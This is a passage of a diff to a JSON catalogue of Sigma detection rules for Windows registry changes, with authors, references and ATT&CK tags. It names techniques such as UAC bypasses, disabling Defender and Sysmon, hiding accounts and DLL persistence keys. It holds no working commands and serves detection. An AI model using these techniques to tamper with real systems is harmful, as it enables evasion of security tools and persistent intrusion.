"https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ] + }, + "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "value": "DHCP Callout DLL Installation" + }, + { + "description": "Detects when an attacker set the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" to \"0\" in order to hide user account.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_special_accounts.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ] + }, + "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "value": "Hide User Account Via Special Accounts Reg Key" + }, + { + "description": "Bypasses User Account Control using a fileless method", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_delegateexecute.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "value": "Bypass UAC Using DelegateExecute" + }, + { + "description": "Detects that a powershell code is written to the registry as a service.", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_powershell_as_service.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "value": "PowerShell as a Service in Registry" + }, + { + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "meta": { + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "creation_date": "2020/09/10", + "falsepositive": "No established falsepositives", + "filename": "registry_set_enabling_cor_profiler_env_variables.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jamieantisocial/status/1304520651248668673", + "https://www.sans.org/cyber-security-summit/archives", + "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" + ] + }, + "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "value": "Enabling COR Profiler Environment Variables" + }, + { + "description": "Detects tamper attempts to sophos av functionality via registry key modification", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/02", + "falsepositive": [ + "Some FP may occure when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + ], + "filename": "registry_set_sophos_av_tamaper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", + "value": "Tamper With Sophos AV Registry Keys" + }, + { + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/01", + "falsepositive": [ + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + ], + "filename": "registry_set_susp_printer_driver.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1410545674773467140", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" + ] + }, + "uuid": "e0813366-0407-449a-9869-a2db1119dc41", + "value": "Suspicious Printer Driver Empty Manufacturer" + }, + { + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/06/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_timeproviders_dllname.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" + ] + }, + "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "value": "Set TimeProviders DllName" + }, + { + "description": "Detects the creation of user-specific or system-wide environement variables via the registry. Which contains suspicious commands and strings", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_suspicious_env_variables.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://infosec.exchange/@sbousseaden/109542254124022664", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence" + ] + }, + "uuid": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "value": "Suspicious Environment Variable Has Been Registered" + }, + { + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "meta": { + "author": "frack113", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_fax_change_service_user.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://twitter.com/dottor_morte/status/1544652325570191361", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "e3fdf743-f05b-4051-990a-b66919be1743", + "value": "Change User Account Associated with the FAX Service" + }, + { + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_administrative_share.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ] + }, + "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "value": "Disable Administrative Share Creation at Startup" + }, + { + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + ], + "filename": "registry_set_mpnotify_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", + "https://persistence-info.github.io/Data/mpnotify.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", + "value": "Persistence Via Mpnotify" + }, + { + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "value": "Disable Exploit Guard Network Protection on Windows Defender" + }, + { + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_eventviewer.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ] + }, + "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", + "value": "Bypass UAC Using Event Viewer" + }, + { + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "meta": { + "author": "EagleEye Team, Florian Roth, NVISO", + "creation_date": "2020/05/13", + "falsepositive": [ + "New printer port install on host" + ], + "filename": "registry_set_cve_2020_1048_new_printer_port.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://windows-internals.com/printdemon-cve-2020-1048/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "value": "Suspicious New Printer Ports in Registry (CVE-2020-1048)" + }, + { + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/26", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_office_enable_dde.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.002" + ] + }, + "uuid": "63647769-326d-4dde-a419-b925cc0caf42", + "value": "Enable Microsoft Dynamic Data Exchange" + }, + { + "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "This rule is to explore new applications on an endpoint. False positives depends on the organization.", + "Newly setup system.", + "Legitimate installation of new application." + ], + "filename": "registry_set_new_application_appcompat.yml", + "level": "informational", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/1", + "https://threathunterplaybook.com/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", + "value": "New Application in AppCompat" + }, + { + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "meta": { + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Administrator actions" + ], + "filename": "registry_set_disable_windows_defender_service.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "value": "Windows Defender Service Disabled" + }, + { + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "meta": { + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "creation_date": "2022/05/04", + "falsepositive": [ + "Legitimate use of screen saver" + ], + "filename": "registry_set_scr_file_executed_by_rundll32.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", + "https://twitter.com/pabraeken/status/998627081360695297", + "https://twitter.com/VakninHai/status/1517027824984547329", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", + "value": "ScreenSaver Registry Key Set" + }, + { + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", "falsepositive": [ "Unlikely" ], - "filename": "win_defender_threat.yml", + "filename": "registry_set_persistence_autodial_dll.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml" + "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", + "https://persistence-info.github.io/Data/autodialdll.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "value": "Persistence Via AutodialDLL" + }, + { + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "meta": { + "author": "frack113", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_susp_user_shell_folders.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" + ] + }, + "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "value": "Modify User Shell Folders Startup Value" + }, + { + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "meta": { + "author": "B.Talebi", + "creation_date": "2022/07/28", + "falsepositive": [ + "Legitimate driver altitude change to hide sysmon" + ], + "filename": "registry_set_change_sysmon_driver_altitude.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", + "https://youtu.be/zSihR3lTf7g", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", + "value": "Disable Sysmon Event Logging Via Registry" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "value": "CurrentVersion Autorun Keys Modification" + }, + { + "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_hide_file.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "value": "Modification of Explorer Hidden Keys" + }, + { + "description": "Hides the file extension through modification of the registry", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "registry_set_hidden_extention.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", + "https://unit42.paloaltonetworks.com/ransomware-families/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", + "value": "Registry Modification to Hidden File Extension" + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "meta": { + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2017/11/10", + "falsepositive": "No established falsepositives", + "filename": "registry_set_mal_adwind.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "value": "Adwind RAT / JRAT - Registry" + }, + { + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "meta": { + "author": "frack113", + "creation_date": "2022/01/06", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", + "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", + "value": "Bypass UAC Using SilentCleanup Task" + }, + { + "description": "Disable Microsoft Office Security Features by registry", + "meta": { + "author": "frack113", + "creation_date": "2021/06/08", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_microsoft_office_security_features.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "7c637634-c95d-4bbf-b26c-a82510874b34", + "value": "Disable Microsoft Office Security Features" + }, + { + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." + ], + "filename": "registry_set_susp_service_installed.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" + ], + "tags": [ + "attack.t1562.001", + "attack.defense_evasion" + ] + }, + "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", + "value": "Suspicious Service Installed" + }, + { + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_macroruntimescanscope.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", + "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", + "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "value": "Disable Macro Runtime Scan Scope" + }, + { + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/07/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_dns_over_https_enabled.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://github.com/elastic/detection-rules/issues/1371", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", + "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1112" + ] + }, + "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", + "value": "DNS-over-HTTPS Enabled by Registry" + }, + { + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_chm_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/htmlhelpauthor.html", + "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "value": "CHM Helper DLL Persistence" + }, + { + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_security_center_notifications.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "value": "Disable Windows Security Center Notifications" + }, + { + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "value": "Hide Schedule Task Via Index Value Tamper" + }, + { + "description": "Detects tampering of autologger trace sessions which is a technique used by attackers to disable logging", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_autologger_sessions.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + 